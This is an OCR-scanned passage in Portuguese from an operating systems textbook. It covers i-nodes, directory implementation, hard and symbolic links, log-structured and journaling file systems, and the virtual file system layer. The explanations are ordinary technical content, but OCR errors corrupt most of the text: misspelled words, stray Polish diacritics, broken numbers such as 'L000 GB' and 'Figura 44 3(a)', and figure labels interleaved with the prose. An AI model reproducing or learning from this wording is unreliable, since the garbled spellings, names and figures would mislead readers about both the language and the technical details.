Essc arranjo e normalmeme muito menorque o cspaęo 
ocupado pda tabela dc arquivos desenia na seęao anterior. 
O motivo e simples: a tabela, para eon ter a lista encadeada 
de todos os blocos de disco, c propordonal em tamanho ao 
próprio disco. Se o disco tiver n blocos, a tabela precisara dc 
n entradas, Conformc os discos crescem, essa tabela crescc 
lincannente. Por outro lado, o esąuema i-node reąuer um 
arranjo na memória cujo tamanho e propordonal ao nu- 
mero maximo de arquivos que podem estar abertos ao 
mesmo tempo, seja o disco de 10 GB, 100 GB ou L000 GB, 

Um problema dosi-nodes e que, se cada estrutura tiver 
espaęo para um numero fixo de endereęos de disco, o que 


Bloco 

fisico 


— O arquivo A comeęa aqui 
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acomeceria se nm arquivo crescesse alem do liinite? Urna 
soluęao e reservar o ultimo endereęo de disco nao para um 
bloco dc dados, mas para o endereęo dc um bloco comendo 
mais endereęos de blocos de disco, conforme mostrado na 
Figura 4,11. Mais avanęado ainda seria ter dois ou mais 
desses blocos com endereęos de disco ou ate mesmo bJocos 
dc disco apontando para ontros blocos de disco cheios dc 
endereęos. Voliaremos a talar sobre os i-nodes ąuando esii- 
vcrmos estudando o UNIX. 

4.3.31 Implementacjo de diretórios 

Anics que possa ser lido, um arquivo <kve ser aberto. 
Quando um arquivo ć aberto, o sistema operadonal usa o 
nome do caminho fornccido pelo usuario para localizar a 
entrada do diretório. Esta fornece a informaęao necessaria 
para en contra i os blocos dc disco. Dcpendcndo do sistema, 
essa informaęao pode ser o endereęo de disco de todo o ar- 
quivo (com alocaęao contfgua], o nu mero do primeiro bloco 
(para ambos os esqiieriias de listas encadeadas) ou entao o 
numero do i-node. Em lodos os casos, a fimęao prindpal do 
sistema de diretórios e mapear o nome do arquivo em ASCII 
na informaęao necessaria para localizar os dados. 

Urna questao intimanienie reladonada e onde os atri- 
butos devem ser armazenados. Todo sistema de arquivos 
mantem os atributos do arquivo, como o proprietario do 
arquivo c o horario de sua criaęao, c des devem ser arma- 
zenados em algum lugar. Urna altemativa óbvia e armazena- 
-los diretamente na entrada do diretório. Muitos sistemas 
fazem exatamente isso. Essa opęao e mostrada na Figura 
4.12(a). Ncsse projeto simples, um diretório consiste em 
urna lista de entradas de ta ma nho (ixo, u ma por arquivo, 
contcndo um nome dc arquivo (dc ta ma n ho fixo), urna cs- 
trutura de atributos do arquivo c um ou mais endereęos dc 
disco (ate um determinado numero maximo), indicando 
onde os blocos de disco esta o. 

Para sistemas que usam i-nodes, urna outra possibl- 
lidade e armazenar os atributos nos i-nodes, em vez de 
iaze-lo nas entradas de diretório. Nesse caso, a entrada de 
diretório pode ser menor: apenas um nome de arquivo e 
um numero de i-node, Essa estrategia ó ilustrada na Figura 


4.12(b). Como veremos mais tarde, esse metodo lem cer- 
tas vantagcns sobre pó-los todos na entrada dc diretórios. 
As duas taticas mostradas na Figura 4.12 correspondem ao 
Windows c ao UNIK, respeaivamenie, conforme veremos 
posteriormentc. 

Ate agora presumimos que os arquivos tem nornes 
amos de tamanlio firn No MS-DOS, os arquivos possuem 
nomes entre 1 c 8 caracteres e u ma extensao opcional de i 
a 3 caracteres. Na versao 7 do UNfX, os nomes dos arquivos 
eram de 1 a 14 caracteres. incluindo todas as extensoes. 
C on tu do. quase lodos os sistemas operacie na is modernos 
dao su porte a nomes de arquivo mais longos e com tama- 
nhos variaveis. Como isso pode ser implemcntado? 

A naaneira mais simples consiste em de terminal um 
limite para o ta ma n ho do nome do arquivo, normalnienie 
em 255 caracteres, e entao usar u ni dos projetos da Figura 
4.12 com 255 caracteres reservados para cada nome de ar- 
quivo. Essa est rategia e simples, mas consome u ma grandę 
quanlidade dc espaęo dc diretório, ja que poucos arquivos 
lerao nomes tao longos. Para efeito de eficiencia, e deseja- 
vel urna estrutura di terenie. 

Urna altemativa e desislir da ideia de que todas as en¬ 
tradas de diretório sejam do mesmo tamanho. Assini, cada 
entrada de diretório passa a conier unia parte ftxa, em geral 
comeęando com o tamanho da entrada, seguida por dados 
com um forma to fixo e que normalmente incluem proprie¬ 
tario, horario da criaęao, Informaęao sobre proteęao e ouiros 
atributos, Essc cabcęalho de tamanho lixo c seguido pelo 
nonie real do arquivo, por mais longo que possa ser, confor- 
me mostra a Figura 44 3(a) em um fermato em que o byte 
mais sigmficativo aparece primeiro (bi^endian) {por exem- 
plo, SPARC). Ncsse excmplo, temos tres arquivos, projed- 
-btdfjet, persomd e foo. Cada nome de arquivo ter mina com 
um caractere esperial (normalmeme 0), que e representado 
na figura por um ąuadrado com duas linlias cruzadas dentro 
ciele. Para que cada entrada de diretório comece na cerca- 
nia de urna palavra, cada nome de arquivo e preenchido de 
modo a ser composto por um numero inteiro de palavras, 
indicado na figura pclas caixas sombreadas. 
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I Figura 4,12 (a) Um diretório simples com entradas de tamanho fixo com os endereęos de disco e atributos na entrada de diretório. 
(b) Um diretório no qual cada entrada se refere apenas a um i-node. 
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Unia desvantagem desse metodo e que, gnaiido urn ar- 
qnivo e removido, ficara uma lacuna de tamanho variavd 
no diretório e o próximo arquivo a entrar podera nao caber 
nela. Esse problema e o mesmo quc vimos com arqtiivos de 
disco conliguos; a linka difcrcnęa ć qnc agora a compactami o 
do diretório c possweL pois de cstd todo na mcmóiia. Oinro 
problema c quc urna linka entrada de diretório pode sc es- 
tender por imiltiplas paginas, podcndo ocorrer H assira urna 
Ma de pagina durarne a leitura de um nonie de arquivo. 

Outro modo de Udar com nomes de arquivo de tama- 
nhos variaveis e fazendo com que as entradas de diretório 
sejam todas de tamanho fixo c ma n ten do os nomes de ar 
quivos jimtos em nma area temporaria (heap) no finał do 
diretório, conforrrte mosira a Figura 4 + 13(b), Esse metodose 
mostra vanlajoso ąuaiido urna entrada e removida, pois o 
próximo arquivo a emrar sempre ca bera, Ć claro que a area 
temporaria (heap) dcve ser gcrenciada c as faltas de paginas 
ainda podem ocorrer durarne o proeessamento dos nomes 
dos arquivos. Um ganho menor nesse metodo e que nao ha 
mais qualquer necessidade rcal para qtie nomes de arqui- 
voscomecem alinhados por palavras, como mosira a Figura 
4.! 3(b), e, portamo, nao e predso completar os nomes dos 
arquivos com caracteres, conforme a Figura 4.13(a). 

Hm todos os projetos ilustrados a te agora, quando um 
nome dc arquivo tiver de ser proc urodo, os diretórios sc- 
rao buscados Mnearmente do inicio oo firn. Para diretórios 
multo extensos, a busca lincar pode ser lenta. Um modo 
dc agiliza-la ć usar urna tabela de espalhamento para ca da 
diretório. Seja n o tamanho da tabela. Ao entrar com urn 


nome de arquivo, o nonie e mapeado em um valor en- 
tre O e n - 1 — por exemplo, dMdindo-se o nome por n 
e tomando-sc o resto. Dc ma od ra altcniativa, as pala vi as 
compreendendo o nome do arquivo podem ser somadas e 
essa ąuantidade dividida por n on algo shnilar. 

De qualquer modo, a entrada da tabela correspon- 
dente a um código de espalhamento e verificada. Se nao 
estivcr sondo usada, coloca-se um pontdro para a entrada 
de um arquivo, As entradas de arquivo ficam apósa tabela de 
espalhamento. Se aquela vaga ja esliversendo osada, sera 
construida urna lista encadeada midalizada naąuela en¬ 
trada da tabela e que ima todas as entradas com o mesmo 
valor de espalhamento. 

A busca por um arquivo segue proccdimcnto idcntico, 
O nome do arquivo e submetidoa uma funęao de espalhamen- 
to para seleeionar uma entrada da tabela de espalhamento. 
Todas as entradas da lista encadeada inidalizada naqucle 
ponto sao veriflcadas para saber se o nome do arquivo csla 
preseiitc. Se o nome nao eon star da lista, o arquivo nao 
estara preseme no direiório. 

Usar uma tabela de espalhamento tein a vantagem de 
uma busca mtiUo mais rapida, mas a desvantagem e um ge- 
renciamento mais complexo. E a u ni ca aiternativa rcal mc me 
seria nos sistemas em que se espera que diretórios possani 
comcr, rotindramente, ccntenas ou milhares de arątiWos, 

Um modo completameme dtferemc de lornar mais rapi- 
da a busca em grandes diretórios e colo car os resultados em 
urna cache de buscas. Arues de comcęar a busca, imcialmen- 
te e feita uma vcrificaęao para saber se o nome do arquivo 
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Figura 4.13 Duas manefras de gerenciar nomes de arquivos longos em um diretório. (a) Sequendal menie. (b) Em uma area 
I temporaria. 
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se en contra na ca che. Se estiver, ełe pociera ser rapidameme 
localizado, evitando, assim, u ma longa pronira. Ć claro que 
a cache somente fundona se a maior parte das consultas en- 
volver um nu mero rclativamente peąueno de arquivos. 

4-Ł4I Arquivos compartilhados 

Quando varios usuarios traballiam juntos cm um pro- 
jcto, Ireąucntcmente des precisam compartilhar arquivos. 
Como consequencia, e muilas vezes com enieme que um 
arqmvo compariilhado apareęa simulianeamenie em dife- 
rentes dirctórios pertenccntes a difcrentes usuarios, A Fi¬ 
gura 4.14 retoma o sistema de arquivos da Figura 4,5, só 
que com um dos arquivos do usuario Cpresente tambem 
em um dos diretórios do usuario B. A eoncxao entre o dire- 
tório de Be o arquivo companilhado e chama da de ligaęao 
{link). O sistema de arquivos agora nao e mais u ma arvorc, 
mas sini um graf o acklico orientado {direrterf acydic 
graph — DAG). 

0 compartilhamento de arquivos e conveniente, mas 
tambem introduz alguns problemas. Para comeęar, se os 
diretórios conłiverem realnienie endereęos de disco, entao 
devera ser feita uma cópia dos endereęos de disco no dire- 
tório de 8 quando o arquivo for liga do, Sc B ou Csubsc- 
quentemente adicionarem blocos ao arquivo (append), os 
novos blocos serao re la don a dos somente no di ret ort o do 
usuario que esta fazendo a adięao. As mudanęas nao serao 
visiveis ao outro usuario, negando, assim, o propósito de 
compartilhamenio. 

Essc problcma pode ser resoMdo dc duas maneiras. Na 
primeira soluęao, os blocos dc disco nao sao reladonados 
nos diretórios, mas cm uma peąuena estrutura de dados 
associada com o próprio arquivo. Os diretórios entao apon- 
tariam apenas para a pequena estrutura de dados. Essa e a 
estrategia usada no UN1X (para o quat a pequena estrutura 
dc dados ć o i-node). 



Arquivo compartiEhado 


Figura 4.14 Sistema de arquivos contendo um arquivo 
I compartilhado. 


Na segunda soluęao, B se liga a um dos arquivos de C, 
obrigando o sistema a criar um novo arquivo r do lipo Link, 
e induir essc arquivo no dirctório dc 6, O novo arquivo 
conteni apenas o nome do caminho do arquivo ao qual 
dc esta ligado. Quando B Ie do arquivo ligado, o sistema 
operadonal sabe que o arquivo quc esta scndo lido e do 
tipo Link, consulta o nonie do arquivo c ie essc arquivo, 
Essa estrategia e chamada de ligaęao simbólica (symbolk 
linking), para contra star com a ligaęao (estrita) tradicional. 

Cada um desses inetodos tern sens problemas. No pri- 
meiro metodo, no memento em que B liga-se com o arqui- 
vo companiihado, o i-nodc grava oatributo dc propriedade 
do arqiuvo como C. A criaęao de uma ligaęao nao altera a 
propriedade (veja a Figura 4. i 5), mas aumenta o contador 
de ligaęoes no i-node; assim, o sistema fi ca sabendo quan- 
tas entradas de diretório estao atualmente apontando para 
oarąuim 

Se C subsequcntemenie tcniar remover o arquivo, o 
sistema enfrentara um problcma, Sc cle remover o arquivo 
e limpar o i-node, B tera uma emrada de diretório apon¬ 
tando para um i-node irwalido. Se depois o i-node for rea- 
tribufdo a outro arquivo, a ligaęao dc B apontara para um 
arquivo er rad o, O sistema pode avaliar, pelo contador no 
i-node, que o arquivo ainda esta sendo usado, mas nao ha 
uma maneira de cncontrar todas as entradas de diretório 
para o arquivo e, cm seguida, reniovc-los. Os ponteiros para 
os diretórios nao podem ser armazenados no i-nodc por- 
que pode haver um mimero ilimitado dc diretórios. 

A unica coisa a fazer e remover a emrada de diretório 
de C, mas deixar o i-node imacio, com o contador em i, 
confonnc mostra a Figura 4.15(0). Agora teirtos uma silua- 
ęao na qual B e o unico usuario a ter uma emrada de dire¬ 
tório para um arquivo cujo proprietario e C. Se o sistema 
fizer contabilidade ou tiver cotas, C continuara pagando a 
eon ta pdo arquivo ate o m om en to em que B decidir remo- 
vedo, e, se o fizer, nesse momento o contador ira para 0 e 
o arquivo sera removido. 

Com ligaęóes simbólicas esse problema nao ocorre, 
pois somente o verdadeiro proprietario tern um pontei- 
ro para i-node. Os usuarios que possuem ligaęao para o 
arquivo tem apenas rtomes dc taminhos, c nao ponteiros 
para i-nodes. Quando o proprietario remove o arquivo, este 
e destrufdo. Tentativas subseąuentes de usar o arquivo por 
meio de ligaęao simbólica fal ha ra o quando o sistema for inca- 
paz dc localizar o arquivo. Remover uma ligaęao simbólica 
nao afeta o arquivo de modo algum, 

O problema das ligaęóes simbólicas e a sobrecarga ex- 
tra necessaria. O arquivo com o caminho deve ser lido e, 
depois, o caminho precisa ser sintaticamente analisado e 
seguido com p one me a componente ate chegar a o i-node. 
Teda essa atwidade pode demandar um numero considera- 
vd dc acessos adicionais ao disco. Alem disso, c necessario 
um i-node extra para cada ligaęao simbólica, assim como um 
bioto dc disco extra para armazenar o caminho; contudo, 
se o nome do caminho for curto, o sistema podera arma- 
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Dtretório de C Diretório de B Direłório de C Diretório de B 



o o o 


(a) 


(b) 


(C) 


l Figura 4.15 (a) Situaęao antes da ligaęio, (b) Depois da criaęao da ligaęio, (c) Depois que o proprietario original remove o arctuiuo. 


zcna-lo no próprio i-node, como um lipo dc otimizaęao. 
As ligaęoes simbóhcas Lem a yamagem dc poder ser usadas 
para ligar os arquivo$ em maąuinas cm qua)quer lugar do 
mim do, slmplesmente media me o fornecimento do ende- 
rcęo dc rcde da maquina em que o arquivo reside, alem dc 
sen caminho naquda maquina. 

Ha tambem outro problcma introduzido pelas ligaęoes, 
simbólicas ou nao, Quando as ligaęoes sao permiiidas, os 
arquivos podem ter dois ou mais caminhos. Os programas 
quc inidalizam sua execuęao cm um dodo diretório e bus- 
cant todos os arquivos daqude diretório e subdiretórios 
localiza rao um arquivo liga do varias vezes* Por exemplo, 
um programa quc salva iodos os arquivos dc um diretório 
e subdirciórios em urna fila podera fazer varias cópias de 
um mesmo arquivo ligado. Alem disso, se a fita for lida em 
o utrą maquina, a mc nos que o programa que salva para 
a lita seja inteligente, o arquivo ligado sera copiado duas 
vezes no disco cm vez de ser apenas ligado. 

_ 4.3.51 sistemas de arquivos estruturados 

com base em log 

As mudanęas tecnológicas estao exercendo pressao 
sobre os sistemas de arquivos atuais. As CPUs estao ca da 
vez mais rapidas, os discos estao cada vez maiores c mais 
baratos (embora nao muito mais rapidos), e o tamanbo das 
memórias alimenta exponendalineiitc. O unico paranietro 
que nao esta se desenvolvendo de forma tao acełerada e 
o tempo de bnsca dos discos. A eombinąęao desses fatores 
sigm lica a cxistenda dc gargalos no desempenho dc niui- 
tos sistemas de arquivos. Pcsquisas realizadas em Berkeley 
icntaram minimjzar csse problcma a partir do deseń volvi- 
mento de um sistema dc arquivos totalmentc novo: o LFS 
[log-struciured fik system ■— sistema dc arquivos do lipo %- 
-structured). Nesia seęao, descreveremos brevememe o fun- 
donamento do LFS. Para uma abordagem mais completa, 
consultc Rosenblum c Ousierhoui (1991). 

A ideia na qual o LFS se baseia ć a dc que as CPUs fi- 
cairt mais rapidas, as memórias RAM ficam maiores e as ca- 
dies de disco tambem estao aumentando rapidamente. Em 
consequenda disso, boje e possivel saiisfazer uma fraęao 


subslandal desolidtaęocs dc leitura direiamcme a partir da 
cache do sistema de arquivos ł sem necessidade de acessos 
ao disco. A partir daf, concluitł-se que, no futuro, a maior 
parte dos acessos ao disco sera para eserka e, portanto, o 
mecanismo de leilura aniecipada utilizado em alguns siste- 
mas para carregar os blocos antes que des sejam ncccssa- 
rios nao vai mais apresentat um desempenho significatWo* 

Para piorar a siiuaęao, na maioria dos sistemas de ar- 
quivos, as operaęoes de escrita sao realizadas em partes 
mu ito pequenas, o quc as torna ex trema menie inefleien- 
tes, uma vez quc urna escrita em disco de 50 ps e sempre 
precedida por uma busca de 10 ms e uma espera rota do na] 
dc 4 ms. Com esses parametros, a dicicncia dos discos cai 
para uma fraęao de 1 por cento. 

Para emender como surgem todas essas pcquenas ope¬ 
raęoes de escrita, considere a criaęao de um novo arqui- 
vo no UN1X. Para escrever esse arquivo, o i-node para o 
diretório, o bloco do diretório, o i-node para o arquivo e 
o arquivo cm si devcm ser escrilos. E possivel adiar cssas 
operaęoes, mas poderiam cxistir probicmas serios dc eon- 
sistencia caso houvesse uma pane antes que as escritas les¬ 
sem realizadas. Por conta disso, as escritas de i-node em 
geral costumam ser feitas imedtatamente. 

Considerando tu do isso, os projetistas do LFS dcci- 
diram rcimplemcntar o sistema de arquivos do UN1X, de 
modo que fosse possfvel utilizar a largura Lotal da banda 
de disco, mesmo diante da sobrecarga, causada, em grandę 
parte, pdas pequenas escritas alealórias. A ideia basica e 
estruturar o disco inteiro como um % (diario), Periodica- 
menie, quando cxiste a necessidade, todas as operaęoes de 
escrita pendent es a rm a ze na das na memória sao agiupadas 
cm um unico segmento e gravadas no disco com um uni¬ 
co segment o contiguo no finał do log. Um segmento pode, 
assim, conter i-nodes, biocos de diretórios e blocos dc da- 
dos, todos misturados. No inicio de cada segmento existc 
um sumario, que cHz o que pode ser encontrado ali. Se o 
segmento medio tiver o tamanbo de 1 MB, e possfvd utili¬ 
zar quase a totalidade da largura de banda do disco* 

Nesic projeto os i-nodes ainda existem c tern a mes- 
ma estru tura quc no UNIX, mas agora estao cspalliados 
pclo log, cm vez de ficarcm em uma posięao fixa no disco* 
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Apesar disso, ąuando iim i-node e encontrado, a locali- 
zaęao dos blocos acontece da mesma maneira* Como seu 
endereęo nao pode ser calcu lado a par Lir do seu i-rumie ro, 
como e feilo no UNIX, a localizaęao de um t-node torna-se 
muito mais diffdl. Para viabilizar esse processo, e predso 
manter um mapa de i-nodes, indexado pelo i-numero. O 
registru i do mapa a po n ta para o i-node / no disco, 0 mapa 
lica armazenado cni disco, mas tambem e matni do cm ca- 
chc c, portanto, as partes pcsadas mais usadas estarao na 
memória na maior parte das vezes. 

Para resumir o que dtssemos a te o moment o, todas as 
operaęóes de escrila sao inicialmente armazenadas na me¬ 
mória c, peri cdi ca menie, gravadasem um unico segmento 
no finał do log. A aberiura de um arqmvo consiste, porta li¬ 
to, no uso do mapa para localizaęao do i-node. Urna vcz 
realizado esse procedimento, e possivd locaiizar os endc- 
rcęos dos blocos a partir do i-node. Todos os blocos cstarao 
I ocal Iza dos cni segment os cm a lg u ma posięao do log. 

Se os di sco s fossem i n Unita men te grand es, a descrięao 
anterior darła conta de toda a historia. Entretanto, os discos 
reais tern tamanho limitado e, sendo assim, o log podera 
ocupar o disco i metro de forma que novos segmentos nao 
possani ser escritos no log. Felizmente, grandę parte dos 
segmentos pode contcr blocos que nao sao mais necessa- 
rios. Sc um arquivo ć sobrescrito, por exempło, seu t-node 
apontara para os novos blocos, mas os antigos conlinuarao 
a ocupar cspaęo nos segmentos antęnorm cnie ocupados. 

Para Udar com esse prób lenia, o LFS possui um limpa¬ 
dor que escaneia o log drcularmenie de forma a compacta- 
-lo, Ele comeca pela leiuira do resumo do primeiro segment o 
no log para verifićar quais i-nodes e arquivos estao la. Em 
seguida, o limpador acessa o mapa de i-nodes para vcrificar 
quais i-nodes ainda estao ativos e quais blocos de arquivos 
ainda estao em uso. Se nada e encontrado, a informaęao e 
dcscanada. Os i-nodes e blocos que ainda estao em uso vao 
para a memória para serem escritos no próximo segmento. 
O segmento original e marcado como Iivre, de forma que o 
log possa utiliza-lo no armazenamento de novos arquivos. 
Dcssa mancira, o limpador se movimema pelo log, rcnio- 
vendo os segmemos antigos do finał e colocando os dados 
ainda aiivos na memória para quc sejam rcescriios no seg- 
memo seguinte. Conscąuentemente, o disco c um enorme 
bulfer circular, no qual a chama da write opera adicionando 
novos segmentos ao imcio e o limpador opera renuwendo 
os antigos do finał. 

Aqui, o sistema de registro nao e trivial, pois, ąuando 
o bloco de um arquivo e movtdo para um novo segmento, e 
necessario que o i-node correspondeme seja localizado, 
atualizado e car regat i o na memória para que seja escrito no 
segmento seguinte. Em seguida, e predso atualizar o mapa 
de i-nodes para que cle aponte para a nova cópia. Ainda 
assim, a administraęao e possfyel e os resultados de deseni- 
penho mostram quc toda cssa complexidade valc a pena. As 
medidas apresentadas pelos trabalhos titados anteriormen- 
te mostram que o LFS supera o desompenho do UNIX por 


uma ordem de magnitude cm escritas pcąuenas, ao mesmo 
tempo que apresenta um desempenho tao bom quanto do 
UN1X, ou superior a ele, nas eseritas e leituras maiores. 

4-3-61 Sistemas de arquivos jaurtwling 

Ernbora os sistemas de a rqu i vos estru tu rados com base 
em log sejam uma idei a mteressante, eles nao sao largamcn- 
te utilizados, em parte por conta da alta incompatibilidade 
com outros sistemas de arquivos esistentes. Ainda assiin, 
uma das ideias presentes nos LFSs, a de robustez dianie da 
falha, pode ser facilmente aplicada em sistemas de arquivos 
mais convendonais. A premissa basica e a de manter um 
registro sobre o que o sistema de arquivos ira fazer antes quc 
ele efetivaniente o faęa, dc modo que, se o sistema fctlhar 
antes da cxecuęao do trabalho pianejado, e possfvel após a 
rcinicializaęao do sistema, recorrer a o log para descobrir 
o que cstava acontece n do no moment o da parada e re- 
tomar o trabalho. Esse lipo dc sistema de arquivos, de- 
nominado sistemas de arquivos journaling, ja esta em 
uso; o sistema NTFS, da Microsoft, e os ext3 o RciscrFS, 
do Liniix, sao do tipo journaling. Faremos a seguir uma 
breve descrięao do assunto. 

Para comprecnder o probiema, imagine unia operaęao 
corriąueira que acontece a lodo instante: a remoęao de um 
arquivo. No UNIX, cssa operaęao c rcalizada cm ti es eiapas; 

1, Rcmova o arquivo de seu diretório. 

2, Liberę o i-node para o conjunto dc i-nodes livres, 

3, Volte todos os blocos do disco para o conjunto de 
blocos livres no disco. 

No Windows, as eiapas sao semelhantes. Na ausencia 
de paradas do sistema, nao faz ififcrcnęa a ordem na quai 
essas eiapas sao executadas; caso contrario, a ordem se tor- 
na relevante. Imagine que a primeira erapa seja concluida e 
o sistema parę. O i-node e os blocos nao estarao acessfveis a 
partir de arquivo algum, mas tampoueo estarao dispomecis 
para realocaęao. Eles estarao em algurn lugar no limbo, di- 
mimiindo os recursos dispomvds. Se a parada ocorrer de- 
pois da segunda clapa, somente os blocos scrao perdidos + 

Se houver aiteraęao na seąuencia dc operaęóes coi- 
-node for llberado primeiro, entao, após a rcinicializaęao, e 
possfvcl reassocia-lo, cm bora a antiga entrada de diretório 
va continuar apontando para ele, portanlo para o arquivo 
errado. Sc os blocos forem os primetros a serem liberados, 
uma parada antes quc o i-node esteja limpo signilkara que 
uma entrada dc diretório valida aponta para um i-node 
que lista blocos que agora pcrtencem ao grupo de blocos 
livres e que podcm ser reutilizados a qualquer instante, fa- 
zendo com que dois ou mais arquivos acabem dmdindo os 
mesmos blocos. Nenhuma dessas soluęoes c boa. 

O quc o sistema de arquivos journaHmj faz e, em pri¬ 
meiro lugar, escrever uma entrada no log Kstando as tres 
operaęóes a serem condufdas. O log e, entao, gravado no 
disco (e, para que nao baja incidentes, lido de volta para a 
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memória de forma a verificar sna integridade). Somenie 
apos o registro no log e que as diferentes operaęoes tein 
infrio. Depois que as operaęoes sao concluidas com suces- 
so, a entrada e exdufda do log. Sc liouver algurna parada, 
ć possivel, após sua recuperaęao, quc o sistema verifique o 
log para saber se ha algurna operaęao pendenle. Caso Maja, 
todas elas podem ser novamenie exccuiadas (varias vezes, 
no caso de repetidas pa rad as), ale que o arqtiivo seja remo- 
vido correta menie. 

Para que o journaluuj lun clone, as operaęoes regis- 
tradas no log dcvcm ser idempotentes, on seja, dcvcm 
poder ser repetidas sempre quc nceessario sem causareni 
nenhum dano. Operaęoes como "atualize o mapa c assinale 
o i-nade k on o Nocą n como li we" podem ser repetidas 
sem nenhum problenta ate que se alcance o objęli vo finał. 
An a Joga menie, a busca em urn diretório e a remoęao de 
unia entrada denominada foobar tambem sao unia opera - 
ęao idempotente. Por omro lado, a indu sao dos novos bio- 
cos livres no i-node K no finał da lista co rre spoinie me nao 
ć urna operaęao idempotente, visto qne clcs podem ja estar 
11 Urna operaęao mais cara, 'pcsqiusc na lista de blocos ii- 
vres e inclua o bloco n somente se cle ainda nao cstiver ta", 
e idempoieme. Os sistemas dc arquivos jourmling precisam 
organizar suas estru i u ras de dados e operaęoes liga da s ao 
log dc forma que to dos seja m idcmpotcnies. Sob essas dr- 
cunstancias, a recuperaęao dc uavamemos pode ser feita 
de forma rapida esegura. 

Para aumentar a confiartęa, um sistema de arquivos 
pode introduzir o conceito de ban co de dados denomina- 
do transaęao atomica. Quando milizado, um grupo de 
aęoes pode ser formado pelas operaęoes begin transaction e 
end transaction. Assim, o sistema reconbeee que as unicas 
duas altemaiivas sao concluir todas as operaęoes do grupo 
ou nao concluir nenii u ma delas. 

O NTFS possui u ni extetiso sistema Mjourmiing e sua 
estru tura dificilmcme 6 eorrompida por paradas do siste- 
ma. Ele vem sendo deseńvolvido dcsde a primcira versao 
do Windows NT, em 1993. A primeira versao do Linux a 
implementar jo a maliny foi a ReiserFS, mas sua popularida- 
de foi frustrada por conta de uma incompatibifidade com 
os sistemas ext2. Em contrapartida, o ext3, que e um pro* 
jęto menos ambicioso que o do ReiserFS, implementa jour- 
nalin$ e mantem a eompatibilidade com os sistemas exi2 
antenores. 

4.3.71 Sistemas de arquivos virtuais 

Muiios sistemas de arquivos diferentes estao em uso — 
em geral, no mesmo computador — e ate para o mesmo 
sistema operacional, Um sistema Windows pode ter um sis- 
tema NTFS principal, mas tambem uma a miga unidade o u 
partięao FAT-16 ou FAT-32, que eon ten ha dados antigos, 
mas ainda ncecssarios. Tambem pode ser que, evemual- 
mentc, seja necessario utilizar um CD-ROM ou DVD (cada 
um com seu próprio sistema de arquivos), O Windows ge- 


rencia esses sistemas distintos por meio da identificaęao de 
cada um com uma leira de unidade diferente — por exem- 
plo, C;, D: etc. Quando um processo abre um arquivo, a 
ietra da unidade esta implfcita ou explicitanieme preseme, 
de modo que o Windows saiba para qual sistema tle arqui- 
vos passar a requisięao. Nao existem tentativas de unifka- 
ęao dos sistemas de arquivos heterogeneos. 

Em contrapartida, todos os sistemas UNTX modemos 
lentam integrar os diferentes sistemas dc arquivos cm 
uma unica estrutura. Um sistema Linux pode ter o ext2 
como diretorio-raiz, com uma partięao ext3 montada em / 
usr f um segundo disco rfgido com um sistema de arquivos 
ReiserFS montado cm /komę e um CD-ROM ISO 9660 tem- 
porariamentc montado em łmnt Da perspectiva do usua- 
no, cxistc somcme uma hicrarquia dc sistema de arquivos, 
c o falo de o sistema iidar com diferentes tipos (Ineompa- 
rivcis) nao fica visivcl nein ao usuario nem aos processos* 

A presenęa de imiltiplos sistemas de arquivos, contudo, 
e totalnie nie visivcl a implementaęao c, dcsde o traballio 
pionetto da Sun Microsystems (Kleiman, 1986), a major 
parte dos sistemas UN1X passou a usar o conceito de VFS 
(yirtual file system — sistema de arquivos virtual) para tentar 
integrar diferentes sistemas de arquivos em uma estrutura 
ordenada. A id eta principal e abstrair a parte com urn aos 
diferentes sistemas e colocar o código em uma caniada sę¬ 
pa rada que chama o sistema de arquivos subjacente para 
fazer o gerenciamento do dado. A estrutura geral e iluś- 
nada na Figura 4.16. A discussao a seguir nao e exdusiva 
do Linux, do FreeRSD nem dc nenhuma ouua versao do 
UNIX, mas da uma idda geral de como os sistemas de ar- 
quivos yirtuais funcionam nos sistemas UNIX. 

Todas as diamadas de sistema relacionadas a arquivos 
sao direcionadas ao VFS para o processamento inicial. Essas 
diamadas, oriundas de processos do usuario, sao as chama- 
das POSIX pa dra o, comoopen, read, write, Iseeketc. Portanto, 
o VFS possui uma intcrface 'superior' com os processos do 
usuario: a ja conhccida interfnee POSIX. 

O VFS tambem possui uma interface Inferior' com os 
arquivGS do sistema, denominada na Figura 4J6 como in- 
terface VFS. Ela co usi sic de algumaś cha ma das de funęoes 
que podem ser realizadas pelo VFS de forma a fazer com que 
o sistema eorrespondente rcalize suas tarefas. Para criar um 
novo sistema de arquivos quc irabaLhe com VFS, portanto, 
os projetistas devem se certificar de que ele oferece as cha- 
madas requeridas pelo VFS. Um exemplo óbvio desse lipo 
de chamada e aquela que le um bloco especffico do disco, 
armazena o comeudo lido na cache de buffer do sistema de 
arquivos e retoma um pontciro para o loeal, Assim sendo, o 
VFS possui duas interfaces: a superior — com os processos 
do usuario — e a inferior, com os arquivos do sistema. 

Nao e sempre que os sistemas gerenciados pelo VFS 
represemam pariięoes em um disco local. Na verdadc, a 
motivaęao original da Sun para construir o VFS foi darsu- 
porte a sistemas de arqmvos remotos utilizando o protoco- 
lo NFS (network file system — sistema de arquivos de rede), 
O projeto do NFS e tao ambicioso que, dcsde que o sistema 
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I F i gura 4.1B Pos ięao do s istem a de arqui vi rtual. 


de arquivos real forneęa ao VFS as funęoes requeridas, o 
sisiema virtuai na o prccisara saber ou sc prcocupar com o 
local de armazenamento dos dados ou com o lipo de siste- 
ma de arquivos cm uso. 

Intern a menie, a maior parte das implementaęoes VFS 
e essenrialmente orient a da a objetos, mesmo que sejam 
cscritas cm C e na o cm C++. Ex istem alguns lipos prin- 
cipais de objetos normalnienie suportados quc inducm 
o superbloco (que dcscrevc urn sistema de arquivos), o 
v-node (que descreve urn arquivo) e o diretório (que descre- 
ve urn diretório do sisiema de arquivos), Gada urn deles tern 
urn grupo de operaęoes associadas (melodos} que o sistema 
de arqmvos real deve dar supone. Alem disso, o VFS possui 
alg u mas csiruturas de dados imernas para seu próprio uso, 
induindo a tabela de montagem e um arranjo de descri¬ 
tores de arquivos para controlar todos os arquivos abertos 
nos processos do usuario. 

Para entender como fundona o VFS, vamos cxecutar 
cronologica menie um exemplo. Quando o sisLcma e ini- 
cializado, o sisiema de arquivos raiz e registrado com o 
VFS, Alem disso, quando outros sistemas de arquivos sao 
montados, seja no moment o da inicializaęao seja durame 
a operaęao, eles lambem devem ser registrados com o VFS. 
Quando se rcgisira, o que o sisiema de arquivos fazę fornc- 
cer uma Usta dos cndereęos das funęoes exigidas pelo VFS, 
seja no fermato de um unico arranjo de chamadas (tabela) 
ou como varios deies, um para ca da objęto, eon formę so- 
licita o VFS, Urna vez que um sisiema de arquivos tenlia 
se registrado, o VFS sabe como ler um de seus blocos — 
